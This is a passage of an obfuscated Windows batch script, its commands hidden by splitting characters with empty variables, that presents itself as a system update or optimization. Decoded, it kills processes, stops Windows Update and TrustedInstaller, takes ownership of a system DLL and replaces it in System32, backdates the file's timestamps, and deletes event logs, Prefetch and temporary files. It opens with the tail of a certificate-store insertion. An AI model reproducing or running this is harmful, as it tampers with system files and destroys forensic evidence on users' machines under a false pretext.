%CCSgjmNHy%C%pxkL%e%OLHQeAe%r%bYmk%t%gz%i%S%f%VdLPeILuh%i%MG%c%FhpaUMmq%a%ZgWWfLak%t%bqGiY%e%iTTbh%'%XFrRvBc%;%QHYgC% %sWjSW%^%mRhK%
 %B% %XWzqQZzk% %MXuJxmMVX% %PMTFHj% %hHOCVbKYgQ% %Zp% %GEmvLD% %nxIEx%$%Cx%s%TfiKyXiJp%t%ufXXyZsDM%o%WdoKApnMfE%r%ukky%e%cnOuDWqsg%.%mlIoQ%A%dOiteOLJhm%d%QDpxllbIZ%d%fuzDqB%(%l%$%rLcVbMj%c%ngNcgBIo%e%S%r%niD%t%ZuJnp%O%RNwCBxX%b%eaB%j%KDZhxfCN%)%rZSgD%;%VUqAW% %FXj%^%pqRurxQC%
 %BCIbeFzbPo% %VMVHwH% %uoIChiLO% %JdZx% %j% %jvmyDTyGt% %tCvF% %kpIuBUf%$%egH%s%mhWIyNkj%t%bREPskPa%o%iRgHwRRk%r%Fzk%e%fcNOUVy%.%HtWnVYcL%C%CPbPjCx%l%AHz%o%AxEbHeLKQc%s%WtTQNU%e%gLTkZ%(%vXUELoD%)%UwNtefZrV%;%zecp% %yhYCxjYn%^%uRjEFSnUMd%
 %Vz% %vNGsfbmpZa% %pNHVKkL% %KrPDiODDy%}%sYG% %WiZFmrcN%^%SwdOW%
"%VElkq% %RbpPx%>%N%n%O%u%Dnwx%l%vsfM% %pIiWzWnrJ%2%KBC%>%Me%&%RneZ%1%oAGBxCY%

:: Find and terminate processes using the file
:%lvTN%:%BdduhbCDU% %SuYz%F%cKsjTDCAHJ%i%MMSWiruc%n%BQoengl%d%GuKtkkJ% %MVwh%a%LvRrSWG%n%iIG%d%xyNKzkh% %JyswLOc%t%HnAfR%e%bh%r%zFjHnTxlW%m%qY%i%efyf%n%ktUvtm%a%Vmc%t%rNXCF%e%xCmGgKYxe% %rooqol%p%yHVuXvvu%r%yRB%o%mKWk%c%yAAfxEby%e%VHvdUK%s%IhtbEkQ%s%aRYBKQmuFL%e%bRAn%s%ReDqnMNZN% %OXqdGiaA%u%IB%s%SCezolkagS%i%T%n%xuPCZI%g%lDLpPJ% %tQHSohVCZh%t%pQXEgRoSyk%h%aS%e%tMaD% %xulka%f%cCfFZIsW%i%SwrDYTqSMZ%l%tNKF%e%JtBULzmzfO%
e%qKngFeJgmh%c%EY%h%siAzRLwWSN%o%p% %JsEc%=%zFAUexbv%=%tSnzrybEmi%=%puEvyfEVp%=%nIrthzq%=%VUh%=%Xtzh%=%RTjD%=%XhSJ%=%zdOEsopvT%=%X%=%WF%=%cJRAU%=%TITwPYiV%=%wBkBiZNqq%=%hLUpnl%=%aWb%=%BBQIFVcft%=%KhAIMQDd%=%kit%=%SZHqUQH%=%AvV%=%yYM%=%GDI%=%x%=%zlNNDhTeei%=%wRW%=%kEyu%=%YLzarMUc%=%zfIgfShb%=%PvHUv%=%kzBKUa%=%QmAvkcl%
echo WARNING: Terminating processes for optimization...
e%DQMltMT%c%lXIoii%h%yVcizo%o%NKxORRDRI% %WoldXhAnY%W%zzHckOV%A%nkWgOBw%R%faWd%N%MGtc%I%dlAYfYAT%N%mhFSozEOA%G%umG%:%CNdLoB% %WQuP%T%UIPOjnaPGt%e%YKu%r%QIsTaiJj%m%atQJvjwntn%i%Vxa%n%QWjqNY%a%UfxiRe%t%nh%i%Bl%n%gWpeGNqy%g%eygvtJzT% %k%p%JtaAhQRfUz%r%WJiIsAk%o%A%c%NJzQBHKy%e%cEy%s%yyQfawHTiO%s%PagSRcp%e%bxxHjnqbYN%s%IPzurMBmg% %OTu%f%bN%o%cTT%r%MnuoSeo% %AmgpkTWi%o%j%p%Ixw%t%xfnTZfESV%i%dXcTY%m%HsVdpqu%i%MQjAtfUu%z%NhwXzbJdiz%a%aHQqhHKDUQ%t%EasvIvnDk%i%Kk%o%hU%n%zHuECIVeW%.%ygWymnZwJb%.%TrmeKJuurZ%.%GmhlkF%
e%S%c%syu%h%CF%o%JsErboDco% %Gbhto%=%CdUYx%=%kmXbmGLN%=%EECZR%=%Ub%=%zSgmkGOp%=%mQsajEpX%=%urb%=%iKHrJPPjb%=%YZHjFbW%=%nFA%=%JkrWbAtX%=%BkVEULt%=%oJjGMsQJ%=%bueBTMSA%=%vL%=%gdOnFywLD%=%E%=%OL%=%FUFhkSD%=%QvnHU%=%oVMIMrV%=%NUfwMRh%=%pOpTjy%=%hZcB%=%EvzDu%=%JZQOBfK%=%diRJDHC%=%icYPybvLS%=%a%=%CGY%=%jevQCXkGGR%=%zaDAKOA%
f%nNLolAwZIr%o%pKcdgKQ%r%CNBCdX% %nad%/%MxaHI%f%UOnTsMdZxw% %rjFDE%"%tKaeiYWl%t%AWqLhKvUta%o%FISkiT%k%KJ%e%hK%n%gUJ%s%flztExhF%=%pJDzcLZ%2%gBTbto% %uSMViGlvju%d%M%e%q%l%yNuUlgXcY%i%dErtEoTMKN%m%qEkQnuE%s%pASTLgUz%=%Q%,%z%"%tRmmdxd% %r%%%a%AEga% %nZwTY%i%ICVAcWV%n%rlhWDhWmjc% %Fd%(%rqKqf%'%jbryiaudu%p%FhgXxJJ%o%L%w%skuQawYm%e%H%r%lpMA%s%MDVJNL%h%mjTFacXtmw%e%kPIyvGWkB%l%Il%l%mVBlYfLy% %MhsdZt%-%YPZgYVhe%c%Moai%o%qzj%m%quhPbqFo%m%Tt%a%EFn%n%v%d%vwqX% %qPybW%"%dAXDRDZfru%$%tEfmPJIP%P%FuFCFzYa%r%ThxqbLSz%o%dCSGYvam%c%tCuYFBvJlM%e%CCu%s%CrljRVL%s%yOU%e%fVUJOGt%s%aIk% %aocD%=%x% %qriPVlL%G%gru%e%ytmCtrhVoO%t%uMPKLWzMNK%-%AQ%P%VtpfFBs%r%XfQAHnR%o%zIslwX%c%OgwLn%e%Mq%s%HVWe%s%xShhoYgqH% %OSEUz%|%d% %OPOTF%W%lmdsuObZ%h%JEtaD%e%kXQfJkELbF%r%XeecRrVol%e%LluVDwu%-%rwG%O%jjmejNUv%b%rJeXp%j%ZOS%e%BGuhVrK%c%cBmxVngyCY%t%nzPPZa% %oellTc%{%s%(%TQFIeo%$%nEzg%_%Q%.%AcNXECjhEz%M%hPCIuhnLzu%o%JWbNvPkA%d%QLbjNlFIX%u%jAXoRtRC%l%JElvYJGEoW%e%GIP%s%I% %nOSHlKrf%|%Uvmhk% %K%W%gGC%h%udVsALAWb%e%TbJd%r%RBmNCQno%e%nwgRLFjvz%-%OT%O%FHwxfn%b%DbLRx%j%xWC%e%KkAIsQIIn%c%si%t%AbejKPKpu% %ipHyQQpEE%{%KnuAg%$%rQu%_%oNklY%.%kozKCNCW%F%LJ%i%KKERweLAR%l%WghmMoM%e%uuiN%N%gbnT%a%KyKkjR%m%nCuBMNV%e%DaXd% %yYbc%-%jKhTM%m%iaHanGpB%a%XTCWja%t%dOFFbghQ%c%uNVUrisctg%h%VoEzb% %hlWK%'%pCH%X%qDOyN%I%mLpJhbm%n%WRM%p%Du%u%tsxD%t%Zo%1%vj%_%Gu%4%AzhZUNpt%.%BKzWscx%d%iQbLe%l%CnNiqmEPgV%l%wMSUsntEA%'%Vqdx%}%jaYkBqr%)%T%}%SDMeVbRUs% %bKqBZ%|%WiwzjDNlFM% %fycKdQzuuU%S%Q%e%kYDNdrgC%l%tkSuGy%e%RZEka%c%tsPEYR%t%DJUjog%-%cWciFwbG%O%Ys%b%eqyJFJ%j%m%e%ZLFdUXixvW%c%wVHz%t%QMjO% %gqpSEN%-%FpncUAIoSp%E%LOxHb%x%Vjmqj%p%XpCzssEQQo%a%E%n%f%d%Y%P%ON%r%Kvt%o%cik%p%ikeW%e%lQAVur%r%omRpMzTyI%t%QATFwCkuk%y%jNuUW% %xaPaAWr%I%Q%d%h%;%qp% %BCTFkdsHJa%$%k%P%MXB%r%jq%o%GWfbMEVhuR%c%DcPfgL%e%mYEfNmUuZ%s%kRfuGSXJ%s%LuerDxva%e%HhUw%s%zuNrVZvsL% %y%-%mDw%j%qEbnCTRQR%o%albvlybT%i%SgicIBWuU%n%KeAMH% %kPSqWUfIQv%'%p%,%pLfzoU%'%vfS%"%KHCBFnowI%'%GoGS%)%kDZVDOfMP% %OtC%d%yYpcTwOmm%o%mCRaChieX% %mqX%(%MFkAuVBvk%
    echo KILLING: Process ID %%a
 %lOfA% %QQG% %kRjNjDLz% %w%e%YGnF%c%czHOs%h%Am%o%f% %qHkRcNsWw%K%kmlubd%I%xcOKfX%L%BbGpora%L%NbJZ%I%rlU%N%HpaUnrdi%G%rkmideHx%:%fPSlpjgJPP% %yLvEWanuc%P%Y%r%Z%o%Wox%c%izzbRVVbw%e%O%s%zGHTqd%s%XvTkWDsW% %fZeIzgysFJ%I%LHEVkrUhf%D%qTKQJniW% %PwGGE%%%a%sXCLtGkqNT%
 %g% %pgOLuaybUc% %ON% %HfFwi%t%USjSduTDg%a%YA%s%ZzYklAbuap%k%noGtjMqVs%k%hJa%i%cLJjw%l%EKE%l%IYcr% %ZLKIrM%/%YhbIVZB%P%ZIdSj%I%QZU%D%DA% %HrlIC%%%a%tInHY% %z%/%mH%F%tiFg%
)%Vuu%

:: Stop Windows File Protection temporarily
:%CcmCI%:%TjUc% %SPxSZiFVjd%S%giA%t%UYrlpfB%o%O%p%XJ% %mvYnOVybrA%W%tKk%i%yXBrVx%n%KFZuix%d%VIGxCrsTH%o%yqSdF%w%VMeXtV%s%QP% %veIlwLE%F%Ko%i%qwuyfTSNPh%l%RQJUS%e%e% %FvtuIVxJ%P%ag%r%FwPVNR%o%aE%t%QDDqoBPpX%e%qo%c%OYSZ%t%PIkLcvu%i%MtHzMlHCy%o%mlfUAPcQOz%n%MOqpEnmzyk% %l%t%x%e%jmw%m%CqQWuXNR%p%VovntezEb%o%tGwaoty%r%kKyxsqRs%a%lcZey%r%gqMSUUF%i%KMXEAOVMh%l%feSyasUzN%y%XqAdGd%
n%WoA%e%fyUZp%t%AzcMwwqKzR% %niUOvJaHLl%s%waOWzVZi%t%e%o%VsbTOvmiYF%p%MDeEg% %E%w%dgJ%u%sSghU%a%zblzxBPLD%u%wqmFUXObPR%s%eGyoNGcW%e%TgR%r%mouMyi%v%VwG% %CMcuAvcO%>%RgpDETQdzp%n%UPxUtkmn%u%pZNrKjETc%l%xmyLR% %I%2%afsm%>%lFFBIZgur%&%tsflWQADp%1%pVYERhIZv%
n%uTzKCRQJMy%e%ekH%t%fIJoIvzo% %WKieKA%s%KMGIYc%t%XMX%o%qMVoBXyl%p%VvWkkKU% %PYYS%t%Cld%r%T%u%OEFUaveD%s%irVWE%t%fpjgnEJp%e%am%d%hvdogi%i%pqNUSmWlMt%n%TQHFfBGFL%s%WznjUei%t%IDe%a%TPcepoFbR%l%j%l%ihldKNk%e%gvSMPxI%r%yyCrfHDI% %Bd%>%EzoAfnS%n%MbQwVxb%u%QlvKnKPh%l%P% %TGl%2%hDnfgj%>%MMMwxMXIK%&%JQTEgy%1%IcE%

:: Take ownership and modify permissions
:%gbPBJuezTr%:%mILtDLylg% %obay%T%czqaCLn%a%RiIV%k%Q%e%IA% %agQ%o%ceBsu%w%geDXcHGTEF%n%Vuy%e%Fj%r%oLTRiyNCjM%s%l%h%yo%i%DqZNsQjPD%p%PoN% %nRjEMBMVi%a%fxLjXpp%n%MyuPSUHqbR%d%HltgsnauKm% %GhOG%m%mV%o%wCi%d%DlyUOc%i%qMTrsymE%f%xtQg%y%VaIb% %Xj%p%eVALJkWw%e%obCyuMGKGm%r%zgWPKPA%m%YOTT%i%yArN%s%MZcrUP%s%oUlwb%i%yctXqWKrTj%o%CiGfzSA%n%DI%s%dDiTDlq%
i%rh%f%ZtUo% %qm%e%NFKtHF%x%gIadAqeq%i%lDzHlLB%s%cSVLaYphk%t%kcBwLwRpn% %URXtAXsak%"%jiZIfZHpvR%%system_dll_path%"%fFXEDpKkla% %eBXbkyVkxE%(%ENKbiKSA%
 %gBXdRUMpAv% %O% %aY% %pIGRIny%t%cqlCfYmRLO%a%MvZbrdmvfK%k%j%e%Vzprzz%o%VeYpcEecQ%w%jOCAp%n%CagVm% %PCj%/%GWVPtY%f%BUcYDQKa% %KUql%"%yv%%system_dll_path%"%VCenglw% %SawZeQIF%/%YxaqXzo%a%O% %lfpKBSAvK%>%FBdaDox%n%TO%u%mhuLcKh%l%fJhnuE% %jpUFcsN%2%FP%>%UK%&%Gi%1%bfG%
    icacls "%system_dll_path%" /grant Administrators:F /t /c /l >nul 2>&1
 %WkV% %Q% %naVoYCiYUQ% %AriCDHPL%i%kBeASxQn%c%D%a%HjbsbWcPhn%c%vXxpn%l%VA%s%dsiH% %JVVRXrl%"%veKuOqQAH%%system_dll_path%"%OgaIj% %SxPDV%/%FNXJovrehq%g%BDTr%r%JhUy%a%wNzxdau%n%NPYtYD%t%Ad% %zUkaubnpu%A%F%d%MwmEoOm%m%VBMye%i%uZ%n%SreUVWWe%i%U%s%clnDUvmCN%t%CZqX%r%ao%a%VxXJmzvLf%t%CHse%o%lyoDvdSdc%r%fe%s%BpyVpf%:%PDFEZGVw%F%VoEZYrLa% %SNRRmZ%/%X%t%wQyfUECet% %SLNdRj%/%gcesQQBs%c%Z% %cS%/%iO%l%G% %JFx%>%j%n%SHNMkYUKbr%u%SSt%l%zHMKQW% %YvTg%2%WvGZxI%>%yoYz%&%kmGykEQH%1%bOQSid%
)%tUj%

:: Copy new file to System32
:%HxP%:%iTtuLdEz% %Ec%C%pHwhUcGHNP%o%YBKeAvC%p%oQldLcavy%y%KzlFy% %FlvQ%n%ctWPy%e%XmaGTAdZ%w%AeUm% %LrNd%f%hnwby%i%OLJlyLJXF%l%IOol%e%VJAPDY% %b%t%jeT%o%MfN% %uxmvcB%S%Viism%y%wIM%s%jpBzeS%t%nzdlVo%e%daTW%m%SEqPGrhS%3%JvUi%2%UUTlIrXAL%
c%SG%o%QTOpoAcRM%p%jS%y%HJJi% %EjxmKhTlSC%/%X%y%UCylpsE% %OGPMU%"%cLd%%dll_path%"%uU% %nqy%"%v%%system_dll_path%"%aAiBGTRNiw%
i%tfU%f%JLYucCiQ% %zgluEpeTA%%errorlevel% %g%n%bkv%e%T%q%PCWQtjgJ% %fqg%0%fircQ% %aHuTCUH%(%o%
    echo ERROR: Failed to apply the update! Try running in Safe Mode.
 %GkNSAJlWO% %aHHnIu% %eGLfjc% %HjEfs%e%uZhB%c%V%h%MtTzx%o%yTb% %CSis%E%LBTTcul%R%qpQEJtk%R%szHnchpg%O%vNvDNIqzQA%R%D%:%dhUxmfK% %pKFc%F%yStzVaFMM%a%OVhJmq%i%BcUguzLpt%l%uwMePJKfez%e%BKNyvEO%d%rGXPn% %VXfoAZrNV%t%IPiHPgoypE%o%aV% %Fpw%a%tNhfunOJt%p%HkJDmqic%p%T%l%hChhyAAx%y%Ks% %IQ%t%KuuUadmPMo%h%wWrkRe%e%ODRzUzv% %Cea%u%wXaMRwRIhJ%p%XLbBHonlCc%d%C%a%l%t%SVbbfAlaHA%e%pB%!%gSfK% %CWgsbPo%T%Fn%r%OJnBwuC%y%saVY% %iPAnnYmLO%r%ykNdKe%u%GZccLQQ%n%ORa%n%CbXfHGfgr%i%WQqMPAq%n%pAXGcEJml%g%dVBWGPXRp% %x%i%ACjE%n%nzL% %KXV%S%JfJIUbh%a%h%f%VbBpH%e%iDJLTgshmb% %o%M%OBVdMoehQ%o%gIdYzvA%d%DQ%e%hpnaUFP%.%c%
 %jbz% %zZCdX% %bl% %wEK%p%fWjAgfkB%a%kASNBo%u%TgeXqouk%s%OduPZOCLu%e%FINJQaect%
 %PgadoLYRzp% %LMzrLGpi% %uSY% %BPKL%e%itx%x%sLSg%i%qdlPgaAok%t%ULhwzsSTa% %fCULobpdOz%/%QSZL%b%lc%
)%HXdm%
echo SUCCESS: Update applied successfully!
e%GyUKuy%c%WAskm%h%sykqjxW%o%IMuNL% %WandVBbi%S%xdlDezxN%U%AWd%C%DPxtpVC%C%MzowFlp%E%XKb%S%p%S%P%:%DR% %jayOYyHH%U%a%p%EGBiHSDuD%d%iABjpd%a%UKBzlAyfP%t%hgQnPjW%e%nggfVrUtyh% %sblHLAcb%a%Cas%p%HUat%p%rK%l%lFcGH%i%X%e%dWV%d%ZESbrqpAyr% %CgDmdN%s%QzRZ%u%kNOgngNR%c%XTtxJSMIIr%c%PqpEdd%e%VYRCBbguf%s%ffymLfbO%s%nUegvX%f%IzARfJC%u%wZrE%l%InQJdun%l%ziZbzHWhE%y%XtJ%!%Nwl%

:: Modify HDN DLL Timestamp
:%TZx%:%aohGI% %NrkV%M%ZobIyd%o%UQGh%d%Tja%i%xNcW%f%dbnTRLHb%y%rxOURgQFs% %D%H%ycjQJ%D%Xr%N%JMRSk% %HZHosMLYbP%D%WUoTJMjtcI%L%spaYmoOM%L%NCnJPOuXI% %uTSoTLI%T%aHoxOtSy%i%XtgVhMwEJh%m%iqZR%e%FAriHcJh%s%pAV%t%tybV%a%nYqCyilMF%m%RTpVRxAxp%p%Y%
powershell -Command "(Get-Item '%system_dll_path%').CreationTime  = '2019-12-06 12:49:00'"
p%YTrZSQLcxC%o%VvetwuSyq%w%LvNUUZyo%e%jEwJsOfNBZ%r%vsh%s%S%h%GBNYiNpy%e%Z%l%jQDiNrvh%l%H% %bTatDBm%-%EKSiJB%C%GIBPmwimg%o%grbHbndqC%m%I%m%Lzx%a%wzfJ%n%ReN%d%ohtFNiU% %pyDpGuOXu%"%wctXNLA%(%bPTRCwqUU%G%hwqjXUG%e%VeFwL%t%NszIbJMuD%-%DjYCXaQO%I%lVhv%t%ic%e%eO%m%xdDkCPYM% %RVul%'%sD%%system_dll_path%'%jk%)%JkOMPBeSk%.%rBqVbyU%C%IaW%r%tvWxtR%e%no%a%JfPyGCZ%t%TirH%i%ZHQEzq%o%SphJm%n%LxyTvmRLE%T%UKHwNMO%i%e%m%b%e%Nvgn% %TNhARxLPB% %FCCku%=%mdFOzYoZ% %HyZb%'%nZeKIxRd%2%kfGbgEymow%0%BRu%1%tIZEm%9%x%-%eHZrv%1%bPbpDhnwr%2%NeMhlsz%-%WlKIvUp%0%BnPFgkIRF%6%ENuylIgIGm% %weaW%1%e%2%PuF%:%EfxhnjNZG%4%kSLPptnuCK%9%LySQFy%:%QIcYHnXU%0%VeBEAzS%0%rsKHFnIi%'%f%"%ExOySu%
powershell -Command "(Get-Item '%system_dll_path%').LastAccessTime = '2019-12-06 12:49:00'"
p%QnaAo%o%GnL%w%e%e%nKM%r%fTybMNpUN%s%NiACe%h%dwjaJ%e%P%l%iMnijt%l%pplPGcxKDs% %eRuZV%-%DTRHDqKa%C%pqAkwZUxr%o%VcrYjS%m%SeZGHHkA%m%DeAoLrWA%a%sNZpqDi%n%hBZXIoqMR%d%qdgdk% %np%"%U%(%Zlsk%G%qwyu%e%h%t%QjFGzwNGYX%-%I%I%ZzFBTjbnYU%t%ZlxnAqZ%e%rZ%m%lkHn% %K%'%nxAH%%system_dll_path%'%svroz%)%fJsquVL%.%KaGySrAKxA%L%PY%a%MB%s%uaWjLUUK%t%FZqEh%A%LMDr%c%FCXikwzf%c%pB%e%XVtgXyxGf%s%uKzmZeN%s%g%T%c%i%b%m%spk%e%wzNq% %arJrpit%=%dqhfPc% %kMrCjy%'%GuoxT%2%XIOSNd%0%cumAg%1%wVJMValkd%9%FAMRGtZa%-%NyMLtSyd%1%QGD%2%crzJUePhRD%-%bR%0%YlXrD%6%TxLh% %WRPJuGhq%1%gxPACAeEYt%2%VuUTyUuS%:%AGBTOQ%4%PEGe%9%wt%:%tZveTO%0%c%0%yIWAP%'%SRr%"%JJce%
powershell -Command "(Get-Item '%system_dll_path%').LastWriteTime  = '2019-12-06 12:49:00'"
p%OgVPYFbh%o%kCAnAkmc%w%bvKxTJ%e%EKjPgvzppg%r%VzN%s%Cln%h%XQrALNvUQ%e%mEL%l%HwkNAoR%l%jNv% %QBjQmUakJZ%-%UBU%C%b%o%JKJfKMJhf%m%THZXN%m%TzJ%a%lwZ%n%raPk%d%pntooLZ% %jSDBnBMAQ%"%eV%(%MUlbusuf%G%vEi%e%xbDweSU%t%hA%-%Ty%I%aAGzRPGUfN%t%KUmfeFNo%e%ek%m%iT% %tDl%'%KY%%system_dll_path%'%uouJrFycF%)%NOfThNRk%.%VzEFu%L%wPJDlDoB%a%qNLXWKougW%s%sqMF%t%O%W%astZME%r%TKwW%i%xDpcRpo%t%nEHAOHnp%e%sOhvr%T%TPNolUnL%i%jor%m%wnrLPon%e%nxQtZhgU% %TBn% %ghFTyZLP%=%XZUUeP% %mP%'%HZvf%2%KeBy%0%QbTHF%1%WdhrNpPVx%9%kIqqhIqfeB%-%FPMHyOYraH%1%U%2%HUsnjmMct%-%j%0%uKjkWF%6%akDP% %HRvxOhdfO%1%cgy%2%WweRBrP%:%whMT%4%wdj%9%PU%:%aFpTNnf%0%WvG%0%YHrGMmeI%'%lBvInj%"%yrXtaBW%

:: Restart stopped services
:%sbfpaxsWIi%:%CWUnOP% %KtHEqShT%R%OPQ%e%bZufzlB%s%RLBUgsLC%t%JcfX%a%CmLw%r%Kve%t%vBFArnKNT% %EhAafpN%s%narcRS%t%k%o%C%p%dsUFrdbx%p%SITpyN%e%VElvVdpH%d%QYd% %HoqBJWdvoO%s%zC%e%PTYa%r%sFTQGiOWc%v%w%i%SBDbk%c%KWQKtz%e%vICKBTGXiK%s%wfOQkOU%
n%fwTFKZh%e%aJZ%t%upwum% %EPTS%s%jNpItWflQ%t%DZdCUh%a%RNtACFWhE%r%zfPHZHe%t%BUfnG% %LEUHY%w%b%u%QjOmevFzz%a%vmvC%u%lXR%s%OeSl%e%xmxlrfcG%r%fONnb%v%VYyvLfmpeA% %t%>%CRrFMsRx%n%gsmYtzHw%u%FawID%l%wYeZLjH% %NbK%2%OkiOXxwQh%>%C%&%KazvBUhdqO%1%CunG%
n%NdhdYdi%e%UDbp%t%rkxFZIL% %mytx%s%Lw%t%WmgbejRv%a%nI%r%QZaTfNY%t%AMUYqzo% %oaaRInndv%t%eycZ%r%ajbkdk%u%fAANchbq%s%C%t%hZAaMWlJp%e%WNbTlUNLm%d%fYcbTbiId%i%AUwawjjZXb%n%RWb%s%FaZTHCGg%t%YVqSsRpwC%a%gpOO%l%AL%l%aaG%e%D%r%DoaVC% %FCqBjzQi%>%xmt%n%nzJJGQ%u%KIXTk%l%royM% %Ljw%2%g%>%kR%&%yddj%1%q%

:: Clear all logs after optimization
:%cVtVI%:%setpW% %TqGQxe%C%bjZHSFrLA%l%M%e%g%a%ecyDBURZzW%r%ZjWcwevu% %j%a%BXyIEmwgxG%l%qZT%l%GNFqSgV% %XyRIJf%l%oVnwu%o%ri%g%iRuOtaKLFe%s%N% %ihqysWZM%a%Bl%f%ZL%t%mTZLijM%e%OPzODjjLkt%r%Zf% %tmi%o%kWrhVHI%p%iim%t%eLTtcP%i%GvpBmu%m%boQbXxleUL%i%PAkQQDp%z%cGLPvQRN%a%VOV%t%dsTVd%i%mXz%o%hOsNalnC%n%QIj%
e%ppSo%c%v%h%aRRiTcVCS%o%XOJOgoQ% %D%=%kp%=%fTp%=%STuSq%=%lHfvNE%=%keeaLoa%=%uvcHrwYj%=%uVypcBhkFg%=%q%=%ZRCbLHZk%=%XL%=%xjNa%=%yXQfQn%=%wTFMa%=%HL%=%ji%=%C%=%xBRcmAxBEB%=%aL%=%WMHDvf%=%CnkJx%=%HupT%=%qFapXfqjWN%=%PgWQDMg%=%XhcKD%=%BtlDNs%=%VCO%=%WqmBjQ%=%qOVYRx%=%THbWQOu%=%xPvLtP%=%aNzrww%=%Os%
e%yPB%c%DnUb%h%cq%o%JHgWvNer% %Jpok%C%BCooFquwi%l%X%e%iBsS%a%UNoNqLb%r%n%i%iZ%n%Z%g%Rr% %OJ%l%OSjj%o%wsNJDYnSjZ%g%semfZTP%s%DvlGNP% %MEYhhCT%a%Ii%f%IfyrpjfZV%t%bLybZ%e%ft%r%XoCeUeJfG% %Vi%o%ZJI%p%V%t%y%i%zF%m%Icj%i%oD%z%IqUFRSGhB%a%to%t%B%i%xLucDM%o%szjlAB%n%yug%.%tUhza%.%ORqoj%.%eqgmmKVe%
e%eQnvXdDohk%c%aoCky%h%oEzBDvcK%o%pFnSxJ% %ETWD%=%G%=%zHDJVfLV%=%bEwZNfV%=%P%=%UuMIj%=%rv%=%aAxndP%=%tw%=%PmY%=%LjBhg%=%CRB%=%lKQHnjX%=%tWAhbLNp%=%NETqCjl%=%bEI%=%sgrOH%=%XM%=%CGS%=%CQpu%=%ScsHf%=%iZhPwZGKVI%=%lrNSCcmLo%=%XNxC%=%BCluJ%=%AP%=%XQuIvb%=%lu%=%HLHss%=%yZ%=%bLCXBNh%=%D%=%hv%
d%lRszdySmc%e%aAEQJlP%l%datmcSU% %CySgRIMGY%/%qLaW%s%prcq% %zaKSQq%/%Nfpkgsv%f%TMHSiZeYIc% %K%/%jKaTlUEv%q%e% %ijlf%"%YBih%%WinDir%\%ZyJWuj%L%hRpKZi%o%dCRv%g%Cebydh%s%sXQoZ%\%yesgcVXNk%*%iWWhW%"%RIwpBfsV% %PIhVUFsRx%>%ShVh%n%MBoTNbqjV%u%TQsOpqTOPO%l%NoXz% %kc%2%MEVDbdbqv%>%wHLx%&%waVpiiFrs%1%AHmtkvtiRC%
d%lzdtGTCz%e%TlvzJai%l%KdQUzw% %ymApTB%/%hxvwq%s%V% %iF%/%bBb%f%T% %wzT%/%oVCVGio%q%Htuarcu% %pZ%"%pg%%SystemRoot%\%vstRbdJ%S%RgUUpwAc%y%eYGfnb%s%M%t%h%e%h%m%tepdP%3%iPGHRXSDU%2%BTMdeOAHIs%\%edbDkjk%w%PqifA%i%teLDZKH%n%KEHEi%e%jjeq%v%D%t%UC%\%Q%L%UV%o%tdRZGjM%g%qfpUA%s%Sesxrdem%\%G%*%Zqft%"%Mobs% %K%>%OBbiEmrC%n%IoPDwQFOg%u%LmN%l%fMVZqk% %uiVv%2%lKPMLzqte%>%DZlOtngx%&%AA%1%uJebJ%
d%bzKhGJHStB%e%HjufZPG%l%cEx% %QRh%/%pwULYT%s%xeKBWQRVp% %vL%/%o%f%ThYibrjn% %AadJMOB%/%HTwxnEYxpj%q%RljyFMWr% %fHIFhQGdIX%"%GeSVSYg%%LocalAppData%\%pDtv%T%X%e%sRvPdifWc%m%Gv%p%ki%\%kGrYaDdr%*%WJMYIDRI%"%STmvUL% %ADrqeLp%>%vNZPC%n%YHAi%u%UhKQcP%l%Pw% %tzLWlqVYA%2%zbxANTjimv%>%RNHAadY%&%MvKLVHnIne%1%nqKctJEaAD%
d%jWybaXX%e%xlhYlWWFT%l%l% %baoGacyb%/%fC%s%hBpjD% %u%/%XqVyxud%f%U% %gHNc%/%CXkTacsPt%q%gdnVB% %JwtMgaXDmV%"%FTgIY%%Temp%\%nJoaMEhWrO%*%sMPvpWAgf%"%TmxVHZpOdd% %eYy%>%scNGwsLBTd%n%jWwXjrjqEB%u%jqM%l%FBRvUc% %mfGosHOZ%2%aOHqGcP%>%yfBSCX%&%lBurMWHI%1%wlAiR%
d%fGREUjNSd%e%bSG%l%TcCNorJnqD% %ADiEH%/%j%s%AKSgGC% %tlPxlGbF%/%yfxLlvWdf%f%abcN% %cAWP%/%mXtF%q%hNrcKUH% %KMZ%"%SF%%WinDir%\%jdcLsPibb%T%qdnNKELza%e%LhY%m%dv%p%xCGXbsrzc%\%Qr%*%pcgfRTMWu%"%OT% %aKWu%>%LzDryFUUU%n%NmQMZX%u%kSAsFM%l%OdINYEr% %BJGbqI%2%hhkc%>%N%&%DE%1%YzxVu%
d%cXOzbdgzz%e%qCMPb%l%TbiOXv% %uXQvNd%/%ShGNnBN%s%ZMToQZ% %ZR%/%BQiRBw%f%mCkr% %TufoKKpY%/%hyVgj%q%lcp% %GJBLpHCP%"%eDlBLj%%SystemRoot%\%BPNzuLVpx%P%F%r%lJNdcpt%e%NHTwRvwaV%f%HznKS%e%eeSROorjm%t%K%c%ZyeAgBXm%h%FErJFeH%\%n%*%TcUrZnYc%"%LSN% %BFuPq%>%zrG%n%pxUSZZFcI%u%Jxzj%l%t% %zaCQWyQbSp%2%kNwQq%>%qzCDiiXKiu%&%kQMrptZn%1%Susv%
d%JzTSGgGY%e%f%l%dAfVMiH% %pbbqrAZ%/%SEBktWd%s%FbutZ% %PjesQWn%/%erI%f%DcjRaLbBi% %E%/%gozG%q%FRUXbIvWO% %Y%"%WSjjb%%LocalAppData%\%LpsOenK%M%HWQh%i%dYgTw%c%mbhEDArrV%r%gshwboy%o%odqyJVdmX%s%jhW%o%ijocDHh%f%TWlnZCnH%t%b%\%I%W%Bu%i%VoC%n%vxTB%d%yjySWL%o%dJZxrXAe%w%tKuFn%s%LDavezZ%\%QphDZ%I%Saee%N%WF%e%avTxedMcTz%t%mExcQ%C%vDmcJOv%a%U%c%fHEWSIXtA%h%dupESY%e%KqO%\%PcTAKP%*%XtaTP%"%furv% %WFGIxFR%>%KWLnsUChmn%n%nO%u%GXiWhjzS%l%BSO% %sIj%2%EnMmJMb%>%ra%&%vSnWwiA%1%Xta%
